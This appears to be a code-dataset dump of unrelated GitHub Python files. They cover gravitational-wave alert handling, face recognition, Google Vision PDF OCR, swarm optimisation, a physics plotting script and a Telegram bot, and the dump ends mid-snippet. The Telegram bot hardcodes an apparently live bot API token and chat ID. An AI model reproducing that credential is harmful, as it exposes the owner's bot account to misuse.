Event Boolean\n trig_id = root.find(\"./What/Param[@name='TrigID']\").attrib['value']\n ext_group = 'Test' if root.attrib['role'] == 'test' else 'External'\n\n event_observatory = 'SNEWS'\n query = 'group: External pipeline: {} grbevent.trigger_id = \"{}\"'.format(\n event_observatory, trig_id)\n events = gracedb.get_events(query=query)\n\n if events:\n assert len(events) == 1, 'Found more than one matching GraceDB entry'\n event, = events\n graceid = event['graceid']\n canvas = gracedb.replace_event.s(graceid, payload)\n\n else:\n canvas = gracedb.create_event.s(filecontents=payload,\n search='Supernova',\n group=ext_group,\n pipeline=event_observatory)\n canvas |= _launch_external_detchar.s()\n\n canvas.delay()\n\n\n@gcn.handler(gcn.NoticeType.FERMI_GBM_ALERT,\n gcn.NoticeType.FERMI_GBM_FLT_POS,\n gcn.NoticeType.FERMI_GBM_GND_POS,\n gcn.NoticeType.FERMI_GBM_FIN_POS,\n gcn.NoticeType.SWIFT_BAT_GRB_POS_ACK,\n gcn.NoticeType.FERMI_GBM_SUBTHRESH,\n gcn.NoticeType.INTEGRAL_WAKEUP,\n gcn.NoticeType.INTEGRAL_REFINED,\n gcn.NoticeType.INTEGRAL_OFFLINE,\n gcn.NoticeType.AGILE_MCAL_ALERT,\n queue='exttrig',\n shared=False)\ndef handle_grb_gcn(payload):\n \"\"\"Handles the payload from Fermi, Swift, INTEGRAL, and AGILE MCAL\n GCN notices.\n\n Filters out candidates likely to be noise. Creates external events\n from the notice if new notice, otherwise updates existing event. Then\n creates and/or grabs external sky map to be uploaded to the external event.\n\n More info for these notices can be found at:\n Fermi-GBM: https://gcn.gsfc.nasa.gov/fermi_grbs.html\n Fermi-GBM sub: https://gcn.gsfc.nasa.gov/fermi_gbm_subthresh_archive.html\n Swift: https://gcn.gsfc.nasa.gov/swift.html\n INTEGRAL: https://gcn.gsfc.nasa.gov/integral.html\n AGILE-MCAL: https://gcn.gsfc.nasa.gov/agile_mcal.html\n \"\"\"\n root = etree.fromstring(payload)\n u = urlparse(root.attrib['ivorn'])\n stream_path = u.path\n\n # Get TrigID\n try:\n trig_id = root.find(\"./What/Param[@name='TrigID']\").attrib['value']\n except AttributeError:\n trig_id = root.find(\"./What/Param[@name='Trans_Num']\").attrib['value']\n ext_group = 'Test' if root.attrib['role'] == 'test' else 'External'\n\n notice_type = \\\n int(root.find(\"./What/Param[@name='Packet_Type']\").attrib['value'])\n\n stream_obsv_dict = {'/SWIFT': 'Swift',\n '/Fermi': 'Fermi',\n '/INTEGRAL': 'INTEGRAL',\n '/AGILE': 'AGILE'}\n event_observatory = stream_obsv_dict[stream_path]\n\n reliability = root.find(\"./What/Param[@name='Reliability']\")\n if reliability is not None and int(reliability.attrib['value']) <= 4:\n return\n\n # Check if Fermi trigger is likely noise by checking classification\n # Most_Likely_Index of 4 is an astrophysical GRB\n # If not at least 50% chance of GRB we will not consider it for RAVEN\n likely_source = root.find(\"./What/Param[@name='Most_Likely_Index']\")\n likely_prob = root.find(\"./What/Param[@name='Most_Likely_Prob']\")\n not_likely_grb = likely_source is not None and \\\n (likely_source.attrib['value'] != FERMI_GRB_CLASS_VALUE\n or likely_prob.attrib['value'] < FERMI_GRB_CLASS_THRESH)\n\n # Check if initial Fermi alert. These are generally unreliable and should\n # never trigger a RAVEN alert, but will give us earlier warning of a\n # possible coincidence. Later notices could change this.\n initial_gbm_alert = notice_type == gcn.NoticeType.FERMI_GBM_ALERT\n\n # Check if Swift has lost lock. If so then veto\n lost_lock = \\\n root.find(\"./What/Group[@name='Solution_Status']\" +\n \"/Param[@name='StarTrack_Lost_Lock']\")\n swift_veto = lost_lock is not None and lost_lock.attrib['value'] == 'true'\n\n # Only send alerts if likely a GRB, is not a low-confidence early Fermi\n # alert, and if not a Swift veto\n if not_likely_grb or initial_gbm_alert or swift_veto:\n labels = ['NOT_GRB']\n else:\n labels = None\n\n ivorn = root.attrib['ivorn']\n if 'subthresh' in ivorn.lower():\n search = 'SubGRB'\n elif 'mdc-test_event' in ivorn.lower():\n search = 'MDC'\n else:\n search = 'GRB'\n\n query = 'group: External pipeline: {} grbevent.trigger_id = \"{}\"'.format(\n event_observatory, trig_id)\n events = gracedb.get_events(query=query)\n\n group_canvas = ()\n if events:\n assert len(events) == 1, 'Found more than one matching GraceDB entry'\n event, = events\n graceid = event['graceid']\n if labels:\n canvas = gracedb.create_label.si(labels[0], graceid)\n else:\n canvas = gracedb.remove_label.si('NOT_GRB', graceid)\n\n # Prevent SubGRBs from appending GRBs\n if search == 'GRB':\n # Replace event and pass already existing event dictionary\n canvas |= gracedb.replace_event.si(graceid, payload)\n canvas |= identity.si(event)\n else:\n return\n\n else:\n canvas = gracedb.create_event.s(filecontents=payload,\n search=search,\n group=ext_group,\n pipeline=event_observatory,\n labels=labels)\n group_canvas += _launch_external_detchar.s(),\n\n if search in {'GRB', 'MDC'}:\n notice_date = root.find(\"./Who/Date\").text\n group_canvas += external_skymaps.create_upload_external_skymap.s(\n notice_type, notice_date),\n if event_observatory == 'Fermi':\n if search == 'SubGRB':\n skymap_link = \\\n root.find(\"./What/Param[@name='HealPix_URL']\").attrib['value']\n group_canvas += \\\n external_skymaps.get_upload_external_skymap.s(skymap_link),\n elif search == 'GRB':\n skymap_link = None\n group_canvas += \\\n external_skymaps.get_upload_external_skymap.s(skymap_link),\n\n (\n canvas\n |\n group(group_canvas)\n ).delay()\n\n\n@igwn_alert.handler('superevent',\n 'mdc_superevent',\n 'external_fermi',\n 'external_swift',\n 'external_integral',\n 'external_agile',\n shared=False)\ndef handle_grb_igwn_alert(alert):\n \"\"\"Parse an IGWN alert message related to superevents/GRB external triggers\n and dispatch it to other tasks.\n\n Notes\n -----\n This IGWN alert message handler is triggered by creating a new superevent\n or GRB external trigger event, or a label associated with completeness of\n skymaps:\n\n * Any new event triggers a coincidence search with\n :meth:`gwcelery.tasks.raven.coincidence_search`.\n * When both a GW and GRB sky map are available during a coincidence,\n indicated by the labels ``SKYMAP_READY`` and ``EXT_SKYMAP_READY``\n respectively on the external event, this triggers the spacetime coinc\n FAR to be calculated. If an alert is triggered with these same\n conditions, indicated by the ``RAVEN_ALERT`` label, a combined GW-GRB\n sky map is created using\n :meth:`gwcelery.tasks.external_skymaps.create_combined_skymap`.\n\n \"\"\"\n # Determine GraceDB ID\n graceid = alert['uid']\n\n # launch searches\n if alert['alert_type'] == 'new':\n if alert['object'].get('group') == 'External':\n # Create and upload Swift sky map for the joint targeted\n # sub-threshold search as agreed on in the MOU\n if alert['object']['search'] == 'SubGRBTargeted' and \\\n alert['object']['pipeline'] == 'Swift':\n external_skymaps.create_upload_external_skymap(\n alert['object'], None, alert['object']['created'])\n\n # launch search with MDC events and exit\n if alert['object']['search'] == 'MDC':\n raven.coincidence_search(graceid, alert['object'],\n group='CBC', se_searches=['MDC'])\n raven.coincidence_search(graceid, alert['object'],\n group='Burst', se_searches=['MDC'])\n return\n\n # launch standard Burst-GRB search\n raven.coincidence_search(graceid, alert['object'], group='Burst',\n se_searches=['Allsky'])\n\n if alert['object']['search'] in ['SubGRB', 'SubGRBTargeted']:\n # if sub-threshold GRB, launch search with that pipeline\n raven.coincidence_search(\n graceid, alert['object'], group='CBC',\n searches=['SubGRB', 'SubGRBTargeted'],\n pipelines=[alert['object']['pipeline']])\n else:\n # if threshold GRB, launch standard CBC-GRB search\n raven.coincidence_search(graceid, alert['object'],\n group='CBC', searches=['GRB'])\n elif 'S' in graceid:\n # launch standard GRB search based on group\n gw_group = alert['object']['preferred_event_data']['group']\n\n # launch search with MDC events and exit\n if alert['object']['preferred_event_data']['search'] == 'MDC':\n raven.coincidence_search(graceid, alert['object'],\n group=gw_group, searches=['MDC'])\n return\n\n if gw_group == 'CBC':\n # launch subthreshold searches if CBC\n # for Fermi and Swift separately to use different time windows\n for pipeline in ['Fermi', 'Swift']:\n raven.coincidence_search(\n graceid, alert['object'], group='CBC',\n searches=['SubGRB', 'SubGRBTargeted'],\n pipelines=[pipeline])\n se_searches = []\n else:\n se_searches = ['Allsky']\n # launch standard GRB search\n raven.coincidence_search(graceid, alert['object'],\n group=gw_group, searches=['GRB'],\n se_searches=se_searches)\n # rerun raven pipeline or created combined sky map when sky maps are\n # available\n elif alert['alert_type'] == 'label_added' and \\\n alert['object'].get('group') == 'External':\n if _skymaps_are_ready(alert['object'], alert['data']['name'],\n 'compare'):\n # if both sky maps present and a coincidence, compare sky maps\n superevent_id, ext_ids = _get_superevent_ext_ids(\n graceid, alert['object'], 'compare')\n superevent = gracedb.get_superevent(superevent_id)\n preferred_event_id = superevent['preferred_event']\n gw_group = gracedb.get_group(preferred_event_id)\n tl, th = raven._time_window(graceid, gw_group,\n [alert['object']['pipeline']],\n [alert['object']['search']])\n raven.raven_pipeline([alert['object']], superevent_id, superevent,\n tl, th, gw_group)\n if _skymaps_are_ready(alert['object'], alert['data']['name'],\n 'combine'):\n # if both sky maps present and a raven alert, create combined\n # skymap\n superevent_id, ext_id = _get_superevent_ext_ids(\n graceid, alert['object'], 'combine')\n external_skymaps.create_combined_skymap(superevent_id, ext_id)\n elif 'EM_COINC' in alert['object']['labels']:\n # if not complete, check if GW sky map; apply label to external\n # event if GW sky map\n se_labels = gracedb.get_labels(alert['object']['superevent'])\n if 'SKYMAP_READY' in se_labels:\n gracedb.create_label.si('SKYMAP_READY', graceid).delay()\n elif alert['alert_type'] == 'label_added' and 'S' in graceid and \\\n 'SKYMAP_READY' in alert['object']['labels']:\n # if sky map in superevent, apply label to all external events\n # at the time\n group(\n gracedb.create_label.si('SKYMAP_READY', ext_id)\n for ext_id in alert['object']['em_events']\n ).delay()\n elif alert['alert_type'] == 'label_removed' and \\\n alert['object'].get('group') == 'External':\n if alert['data']['name'] == 'NOT_GRB' and \\\n 'EM_COINC' in alert['object']['labels']:\n # if NOT_GRB is removed, re-check publishing conditions\n superevent_id = alert['object']['superevent']\n superevent = gracedb.get_superevent(superevent_id)\n gw_group = superevent['preferred_event_data']['group']\n coinc_far_dict = {\n 'temporal_coinc_far': superevent['time_coinc_far'],\n 'spatiotemporal_coinc_far': superevent['space_coinc_far']\n }\n raven.trigger_raven_alert(coinc_far_dict, superevent, graceid,\n alert['object'], gw_group)\n\n\n@igwn_alert.handler('superevent',\n 'mdc_superevent',\n 'external_snews',\n shared=False)\ndef handle_snews_igwn_alert(alert):\n \"\"\"Parse an IGWN alert message related to superevents/SN external triggers\n and dispatch it to other tasks.\n\n Notes\n -----\n This igwn_alert message handler is triggered by creating a new superevent\n or SN external trigger event:\n\n * Any new event triggers a coincidence search with\n :meth:`gwcelery.tasks.raven.coincidence_search`.\n\n \"\"\"\n # Determine GraceDB ID\n graceid = alert['uid']\n\n if alert['alert_type'] == 'new':\n if alert['object'].get('superevent_id'):\n group = alert['object']['preferred_event_data']['group']\n # Run on Test and Burst superevents\n if group in {'Burst', 'Test'}:\n raven.coincidence_search(graceid, alert['object'],\n group='Burst', searches=['Supernova'],\n pipelines=['SNEWS'])\n else:\n # Run on SNEWS event, either real or test\n raven.coincidence_search(graceid, alert['object'],\n group='Burst', searches=['Supernova'],\n pipelines=['SNEWS'])\n\n\ndef _skymaps_are_ready(event, label, task):\n label_set = set(event['labels'])\n required_labels = REQUIRED_LABELS_BY_TASK[task]\n return required_labels.issubset(label_set) and label in required_labels\n\n\ndef _get_superevent_ext_ids(graceid, event, task):\n if task == 'combine':\n if 'S' in graceid:\n se_id = event['superevent_id']\n ext_id = event['em_type']\n else:\n se_id = event['superevent']\n ext_id = event['graceid']\n elif task == 'compare':\n if 'S' in graceid:\n se_id = event['superevent_id']\n ext_id = event['em_events']\n else:\n se_id = event['superevent']\n ext_id = [event['graceid']]\n return se_id, ext_id\n\n\n@app.task(shared=False)\ndef _launch_external_detchar(event):\n start = event['gpstime']\n if event['search'] == 'Supernova':\n start, end = event['gpstime'], event['gpstime']\n else:\n integration_time = \\\n event['extra_attributes']['GRB']['trigger_duration'] or 4.0\n end = start + integration_time\n detchar.check_vectors.si(event, event['graceid'], start, end).delay()\n\n return event\n","repo_name":"lpsinger/gwcelery","sub_path":"gwcelery/tasks/external_triggers.py","file_name":"external_triggers.py","file_ext":"py","file_size_in_byte":17174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"41798848648","text":"import cv2\nimport numpy as np\nimport face_recognition\n\n\nfilename = \"Assets\\All_faces.jpg\"\nfilename2 = \"Assets\\IMG-20181024-WA0007.jpg\"\n#cap = cv2.VideoCapture(filename)\n#cap.open(filename)\n# image = face_recognition.load_image_file('ZOZ.jpg')\n\nimage = cv2.imread(filename,-1)\nimageTest = cv2.imread(filename2,-1)\n\nif image is None:\n file = filename.split('\\\\')[1]\n print(f\"Image {file} not found\")\n quit()\n\nif imageTest is None:\n file = filename2.split('\\\\')[1]\n print(f\"Image {file} not found\")\n quit()\n\n# image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n# imageTest = cv2.cvtColor(imageTest, cv2.COLOR_BGR2RGB)\n\n\nknow_face_locations = face_recognition.face_locations(image) #return: A list of tuples of found face locations in css (top, right, bottom, left) order\nknown_face_encodings = face_recognition.face_encodings(image)\n\nx = 0\npeople = ['Hamed','Khaled','Rema','Ali','Lana','Zozo','Yanal']\nfor faceLoc in know_face_locations:\n img = image [faceLoc[0]: faceLoc[2],faceLoc[3]:faceLoc[1] ]\n cv2.imwrite(f'Assets\\Faces\\{people[x]}.png', img)\n cv2.rectangle(image,(faceLoc[3], faceLoc[0]),(faceLoc[1],faceLoc[2]),(255,0,0),1)\n cv2.putText(image,f'{people[x]}', (faceLoc[3],faceLoc[0]), cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255),2)\n x+=1\n \n\n\n\nfaceLocationsTest = face_recognition.face_locations(imageTest) #return: A list of tuples of found face locations in css ( top 0 , right 1 , bottom 2 , left 3 ) order\n\n\nfaces_encoding_to_check = face_recognition.face_encodings(imageTest)[0]\n\n\nfor faceLoc,face_encoding_to_check in zip(faceLocationsTest,faces_encoding_to_check):\n result = face_recognition.compare_faces(known_face_encodings,face_encoding_to_check,0.5)\n np.index_exp(result,True)\n cv2.rectangle(imageTest,(faceLoc[3], faceLoc[0]),(faceLoc[1],faceLoc[2]),(255,0,0),1)\n cv2.putText(imageTest,f'{people[x]}', (faceLoc[3],faceLoc[0]), cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255),2)\n\nresult = face_recognition.compare_faces([encode],encodeTest)\n\nprint(result)\n\ncv2.putText(image, \"Founded Faces\", (30,50),cv2.FONT_HERSHEY_SIMPLEX,1,(255,255,255), 2,)\n\ncv2.imshow(\"Faces Found\",imageTest)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n\n","repo_name":"nightcap79/python","sub_path":"FaceRecognition/singleFile.py","file_name":"singleFile.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25266114032","text":"import os, io\nimport re #regular expression module\nfrom google.cloud import vision\nfrom google.cloud import storage\nfrom google.protobuf import json_format #must be call for json format in my bucket\n\"\"\"\n# all library installed\n\"\"\"\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'fourth-elixir-273216-06b58e3308db.json' #mera service account #\nclient = vision.ImageAnnotatorClient()\nbatch_size = 1 #pdf ke pages \nmime_type = 'application/pdf' #file type\nfeature = vision.types.Feature(\ntype=vision.enums.Feature.Type.DOCUMENT_TEXT_DETECTION) #\n\n\ngcs_source_uri = 'gs://greenertronics-42/test.pdf'\ngcs_source = vision.types.GcsSource(uri=gcs_source_uri)#mere source\ninput_config = vision.types.InputConfig(gcs_source=gcs_source, mime_type=mime_type)\n\n\n\ngcs_destination_uri = 'gs://greenertronics-42/pdf_result'#mere destination\ngcs_destination = vision.types.GcsDestination(uri=gcs_destination_uri)\n\n\n\noutput_config = vision.types.OutputConfig(gcs_destination=gcs_destination, batch_size=batch_size)#function for destination and pages required in batch\nasync_request = vision.types.AsyncAnnotateFileRequest( #An offline file annotation request. feature=document ki detection or source or destination ka function\nfeatures=[feature], input_config=input_config, output_config=output_config)\noperation = client.async_batch_annotate_files(requests=[async_request])\noperation.result(timeout=180)\nstorage_client = storage.Client()\nmatch = re.match(r'gs://([^/]+)/(.+)', gcs_destination_uri) #link ka slash dhonde ga\nbucket_name = match.group(1)#link ka slash dhonde ga\nprefix = match.group(2)#ye . ka\nbucket = storage_client.get_bucket(bucket_name)\n\n\n# List object with the given prefix\nblob_list = list(bucket.list_blobs(prefix=prefix))\nprint('Output files:')\nfor blob in blob_list: #loop jo words recognized word print krae ga\n print(blob.name)\n\n\noutput = blob_list[0]\njson_string = output.download_as_string()\nresponse = json_format.Parse(\njson_string, vision.types.AnnotateFileResponse())\nfirst_page_response = response.responses[0]\nannotation = first_page_response.full_text_annotation\nprint(u'Full text:')\nprint(annotation.text)","repo_name":"AsiyaMazhar/gcp_projects","sub_path":"pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27807238756","text":"'''\r\nSWARM OPTIMIZATION - ENJAMBRE\r\nHecho por Thomas Daniel Avila Blenkey - 20151020012\r\nPara la clase de cibernética cualitativa III\r\nUniversidad Distrital - Facultad de Ingeniería\r\n'''\r\n\r\nimport random\r\n\r\n# Problema\r\nfuncion_objetivo = \"(x1-3)**2+(x2-5)**2\"\r\nop = \"min\"\r\n\r\niteraciones = 10000\r\n\r\n# 1. TAMANO DEL ENJAMBRE\r\ntam_enjambre = 4\r\n\r\n# 2. POBLACIÓN INICIAL\r\n# Rango de la población inicial\r\nx_min = 0\r\nx_max = 7\r\n\r\n# Población inicial\r\nx1 = [random.uniform(x_min, x_max) for i in range(tam_enjambre)]\r\nx2 = [random.uniform(x_min, x_max) for i in range(tam_enjambre)]\r\n\r\n# 4. VELOCIDADES INICIALES\r\np_best = []\r\ng_best = []\r\nvelocidades_x1 = [0 for i in range(len(x1))]\r\nvelocidades_x2 = [0 for i in range(len(x2))]\r\n\r\n\r\n# 3. EVALUAR FUNCIÓN OBJETIVO\r\ndef reemplazar_valores(z, x1, x2):\r\n exec('x1=' + str(x1))\r\n exec('x2=' + str(x2))\r\n return eval(z)\r\n\r\nfor itr in range(0, iteraciones):\r\n\r\n #print(\"X1: \" + str(x1))\r\n #print(\"X2: \" + str(x2))\r\n #print(\"INFO: VX1: \"+str(velocidades_x1)+\" VX2: \"+str(velocidades_x2)+\", PBEST: \"+str(p_best)+\" GBEST: \"+str(g_best))\r\n\r\n # Lista en donde cada elemento es una lista con el valor de x1, x2 y el valor de la función objetivo evaluada\r\n # 16 valores\r\n z = [[x1[i], x2[j], reemplazar_valores(funcion_objetivo, x1[i], x2[j])] for i in range(len(x1)) for j in\r\n range(len(x2))]\r\n\r\n\r\n # 5. SELECCIONAR PBEST Y GBEST\r\n # Selección PBest (16 valores)\r\n\r\n if itr == 0:\r\n p_best = [z[i][2] for i in range(len(z))]\r\n else:\r\n p_best = [z[i][2] if z[i][2] < p_best[i] else p_best[i] for i in range(len(z))]\r\n\r\n # Selección GBest\r\n g_best = min(p_best)\r\n\r\n # 6. VELOCIDADES DE LAS PARTICULAS\r\n c1 = 1\r\n c2 = 1\r\n r1 = random.uniform(0,1)\r\n r2 = random.uniform(0,1)\r\n o_min = 0.4\r\n o_max = 0.9\r\n o = o_max - ((o_max - o_min) / 20)\r\n\r\n # Para la ecuación de las velocidades, se comparan listas para obtener el mejor p_best para cada x1 y x2\r\n # 4 valores\r\n p_best_x1 = [min([p_best[i + 4 * j] for i in range(0, 4)]) for j in range(0, 4)]\r\n p_best_x2 = [min([p_best[i] for i in range(len(p_best)) if i % 4 == j]) for j in range(0, 4)]\r\n\r\n # Calcula las velocidades para cada valor de x1 y x2\r\n velocidades_x1 = [o * velocidades_x1[i] + c1 * r1 * (p_best_x1[i] - x1[i]) + c2 * r2 * (g_best - x1[i]) for i in\r\n range(len(x1))]\r\n velocidades_x2 = [o * velocidades_x2[i] + c1 * r1 * (p_best_x2[i] - x2[i]) + c2 * r2 * (g_best - x2[i]) for i in\r\n range(len(x2))]\r\n\r\n # 7. CALCULAR NUEVOS VALORES\r\n x1 = [x1[i] + velocidades_x1[i] for i in range(len(x1))]\r\n x2 = [x2[i] + velocidades_x2[i] for i in range(len(x2))]\r\n\r\n\r\n# FINALMENTE SE IMPRIME LA SOLUCIÓN EN CADA ITERACIÓN POR CONSOLA\r\nz = [[x1[i], x2[j], reemplazar_valores(funcion_objetivo, x1[i], x2[j])] for i in range(len(x1)) for j in\r\n range(len(x2))]\r\n\r\nzmin = min(el[2] for el in z)\r\nx1min = 0\r\nx2min = 0\r\nfor el in z:\r\n if el[2] == zmin:\r\n x1min = el[0]\r\n x2min = el[1]\r\n\r\nprint(\"ITERACION = \"+str(itr)+\", X1 = \"+str(x1min)+\", X2 = \"+str(x2min)+\", Z = \"+str(zmin))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"tdavilab/python-optimization-algorithms","sub_path":"swarm-optimization.py","file_name":"swarm-optimization.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"689235776","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1.inset_locator import InsetPosition\n\nfrom common.constants import cm, boltzmann_constant\nfrom common.tools import stable_fit_alpha\nfrom gle.theoretics import get_greens_function_parameters\nimport matplotlib.transforms as mtransforms\n\n\ngle_etas = np.arange(0.4, 0.8, 0.01)\ngle_taus = np.arange(0.0, 0.4, 0.01)\ngle_ETAs, gle_TAUs = np.meshgrid(gle_etas, gle_taus, indexing='ij')\neta_tau_ttf_grid = np.load('../eta_tau_ttf_grid_300.npy')\nmarkovian_mask = gle_TAUs == 0\n\n\nfig, axs = plt.subplot_mosaic([['a)', 'b)'], ['c)', 'd)']])\n\n\nplt.sca(axs['a)'])\nplt.plot(gle_etas, gle_etas, c='red', label=r'$\\phi^{-1}=\\eta$')\nplt.scatter(gle_ETAs, eta_tau_ttf_grid, s=2, c=gle_TAUs, label='non-Markov. Langevin eqn.')\nplt.scatter(gle_ETAs[markovian_mask], eta_tau_ttf_grid[markovian_mask], s=20, marker='^', c='black', label='Markov. Langevin eqn.')\nplt.legend(loc='upper left', prop={'size': 8}, frameon=False, bbox_to_anchor=(0.61, 0.9), bbox_transform=fig.transFigure)\nplt.colorbar(label=r'Noise correlation time, $\\tau$ (ps)', fraction=0.1, pad=0.01, location='top')\nplt.clim(0, 0.4)\nplt.ylabel('Energy exchange\\nrate, $\\\\phi^{-1}$ (ps$^{-1}$)')\nplt.xlabel('Friction constant, $\\eta$ (ps$^{-1}$)')\nplt.ylim(0.05, 0.95)\ntrans = mtransforms.ScaledTranslation(0, -0.68, fig.dpi_scale_trans)\nplt.text(0.5, 0.0, 'a)', transform=plt.gca().transAxes + trans, fontsize='medium', va='bottom', fontfamily='serif')\nplt.legend(loc='upper left', prop={'size': 7.5}, frameon=False)\n\n\nplt.sca(axs['b)'])\nw0 = 8.8\neta = 0.4\ntheoretical_Is = np.array([2 * get_greens_function_parameters(w0, eta, tau)[1] / eta for tau in gle_taus])\nplt.plot(gle_taus, 1 / (1 + (w0 * gle_taus)**2), c='grey', label=r'$I = \\frac{1}{1+(\\omega_0\\tau)^2}$')\nplt.plot(gle_taus, 1.0 / (1 + (6.1 * gle_taus)**2), c='black', label=r'$I = \\frac{1}{1+(\\omega_1\\tau)^2}$')\n# plt.scatter(gle_taus, theoretical_Is, s=10, c='black', marker='o', label=r'Equivalent harmonic well')\nplt.scatter(gle_TAUs, eta_tau_ttf_grid / gle_ETAs, s=2, c='orange', label='non-Markov. Langevin eqn.')\nplt.xlabel(r'Noise correlation time, $\\tau$ (ps)')\nplt.ylabel('Energy exchange\\nsuppression factortim, $I = \\\\phi^{-1} / \\\\eta$')\n# plt.colorbar(label=r'Friction constant, $\\eta$ (ps$^{-1}$)', fraction=0.1, pad=0.01, location='top')\nplt.legend(loc='upper right', prop={'size': 8}, frameon=False)\ntrans = mtransforms.ScaledTranslation(0, -0.68, fig.dpi_scale_trans)\nplt.text(0.5, 0.0, 'b)', transform=plt.gca().transAxes + trans, fontsize='medium', va='bottom', fontfamily='serif')\nplt.xlim(0, 0.45)\n\n\nplt.sca(axs['c)'])\ntimes = np.arange(0, 100, 0.01)\nfreqs = np.fft.fftfreq(times.shape[0], times[1] - times[0])\nmean_psd = np.load('mean_psd.npy') / 3.8e5 * 2\ntdomain_corr = np.load('tdomain_corr.npy')\nplt.plot(np.fft.fftshift(freqs), np.fft.fftshift(mean_psd))\nplt.plot(np.fft.fftshift(freqs), 1 / (1 + (np.fft.fftshift(freqs) / 7.4)**2))\nplt.xlim(-0.5, 20)\nplt.xlabel('Frequency (THz)')\nplt.ylabel('Force power\\nspectrum (arb. units)')\nplt.text(0.5, 0.0, 'c)', transform=plt.gca().transAxes + trans, fontsize='medium', va='bottom', fontfamily='serif')\n\nax2 = plt.axes([0, 0, 1, 1])\nip = InsetPosition(axs['c)'], [0.42, 0.41, 0.53, 0.54])\nax2.set_axes_locator(ip)\nax2.plot(times, tdomain_corr)\nax2.set_xlim(0, 1.5)\nax2.set_xlabel('Time, t (ps)', labelpad=0)\nax2.set_ylabel('Corresponding\\nAuto-correlation', labelpad=0)\n\n\nm = 23\neta = 0.4\nT = 300\nplt.sca(axs['d)'])\nxhis = np.arange(5e-6, 3e-5, 1e-6) * m**2 # You defined zeta in the paper in a different way to the sim. So need m^2\npure_cubic_ttfs = np.load('../pure_cubic_ttfs.npy')\ncubic_ttfs = np.load('../eta_0.1_cubic_ttfs.npy')\nplt.scatter(1e3 * xhis, cubic_ttfs, s=16, label='Linear + Cubic friction', color='b')\nplt.scatter(1e3 * xhis, pure_cubic_ttfs, s=30, label='Cubic friction', color='black', marker='x')\n\nfit_xhi = np.linspace(0, np.max(xhis), 2)\nplt.plot(1e3 * fit_xhi, eta + 4.76 * boltzmann_constant * T / m * fit_xhi, c='blue', label=r'$\\phi^{-1}=\\eta + 4.76 \\cdot \\zeta k_BT/m$')\nplt.plot(1e3 * fit_xhi, 4.76 * boltzmann_constant * T / m * fit_xhi, c='black', label=r'$\\phi^{-1}=4.76 \\cdot \\zeta k_BT/m$')\nplt.xlabel(r'$\\zeta$ ($10^{-3}$ ps$/\\AA^{2}$)')\nplt.ylabel('Energy exchange\\nrate, $\\\\phi^{-1}$ (ps$^{-1}$)')\nplt.legend(loc='upper left', prop={'size': 8}, frameon=False)\ntrans = mtransforms.ScaledTranslation(0, -0.68, fig.dpi_scale_trans)\nplt.text(0.5, 0.0, 'd)', transform=plt.gca().transAxes + trans, fontsize='medium', va='bottom', fontfamily='serif')\nplt.ylim(0, 1.45)\nplt.xlim(0, 16.5)\n\n\nplt.gcf().set_size_inches(18.3 * cm, 14 * cm)\nplt.subplots_adjust(left=0.104, bottom=0.129, right=0.983, top=0.924, wspace=0.315, hspace=0.5)\nplt.savefig('../../energy_exchange_rates.pdf')\n\nplt.show()\n","repo_name":"jjhw3/gle_research","sub_path":"drafts/nature_physics/images/scripts/make_energy_exchange_rate_plot/make_energy_exchange_rate_plot.py","file_name":"make_energy_exchange_rate_plot.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43466309796","text":"import telegram \nfrom telegram.ext import Updater, CommandHandler\n\nimport socket\nimport sys\n\n\nclass TelegramBot:\n _tokenBot = \"\"\n _dest = \"\"\n _message = \"\"\n\n def __init__(tokenBot, dest):\n _tokenBot = tokenBot\n _dest = dest\n\ndef isAlive(bot, update, args):\n chat_id = update.message.chat_id\n print(chat_id)\n\n # Create TCP/IP socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n #Connect the socket to the port where the server is listening\n server_address = ('localhost', 5000)\n message = \"Connecting to \"+server_address[0]+\" on port \"+str(server_address[1])\n bot.send_message(chat_id=chat_id, text=message, timeout=60)\n sock.connect(server_address)\n\n filename = args[0]\n message = \"Verifying \"+filename+\" thread\"\n bot.send_message(chat_id=chat_id, text=message, timeout=60)\n try:\n # Send data\n print(\"filename: \"+filename)\n aux = \"filename\\n\"\n sock.sendall((filename+\"\\n\").encode('utf-8'))\n\n # Look for response\n data = sock.recv(1024)\n data = data.decode(\"utf-8\")\n print(\"Received: \"+data)\n\n if data == \"true\\n\":\n message = \"The thread is alive\"\n else:\n message = \"The thread is dead\"\n bot.send_message(chat_id=chat_id, text=message, timeout=60)\n except:\n print(\"Oops!\",sys.exc_info()[0],\"occured.\")\n print(\"Next entry.\")\n print()\n\n finally:\n print(\"Closing socket\")\n sock.close()\n\n\ndef main():\n tokenBot = \"735677331:AAHRclwlnQRnlzcAa9-CR2-0GZjmdjNIF_A\"\n dest = \"848768819\"\n message = \"Hello world\"\n bot = telegram.Bot(token = tokenBot)\n bot.send_message(chat_id=dest, text=message, timeout=60)\n updater = Updater(tokenBot)\n dp = updater.dispatcher;\n dp.add_handler(CommandHandler('alive', isAlive, pass_args=True))\n updater.start_polling()\n updater.idle()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"InventiveWeasel/bot_telegram","sub_path":"telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74508911523","text":"import sys\nstart = 0\nN,K = map(int,input().split())\narr = list(map(int,input().split()))\n\nsum_value = 0\nmax_value = -sys.maxsize\nanswer = -sys.maxsize\nfor 